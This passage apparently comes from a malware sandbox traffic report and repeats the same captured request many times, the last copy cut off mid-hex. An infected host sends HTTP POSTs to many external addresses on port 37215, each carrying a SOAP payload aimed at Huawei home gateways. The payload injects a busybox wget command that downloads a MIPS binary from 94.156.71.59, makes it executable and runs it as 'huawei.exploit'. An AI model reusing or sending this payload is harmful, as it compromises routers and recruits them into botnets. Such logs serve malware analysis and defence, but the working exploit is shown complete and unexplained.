                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1129192.168.2.1334872156.186.239.16737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.834482908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1130192.168.2.135441641.134.179.20437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.838514090 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1131192.168.2.135182841.20.15.1737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.841268063 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1132192.168.2.134510641.94.16.19137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.844222069 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1133192.168.2.1341584197.208.138.10437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.847302914 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1134192.168.2.135532841.161.209.6637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.850028038 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1135192.168.2.1346602156.179.165.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.852883101 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1136192.168.2.1356664197.232.35.8637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.855787039 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1137192.168.2.135167441.153.156.17637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.858494043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1138192.168.2.1342992156.255.158.23237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.860999107 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 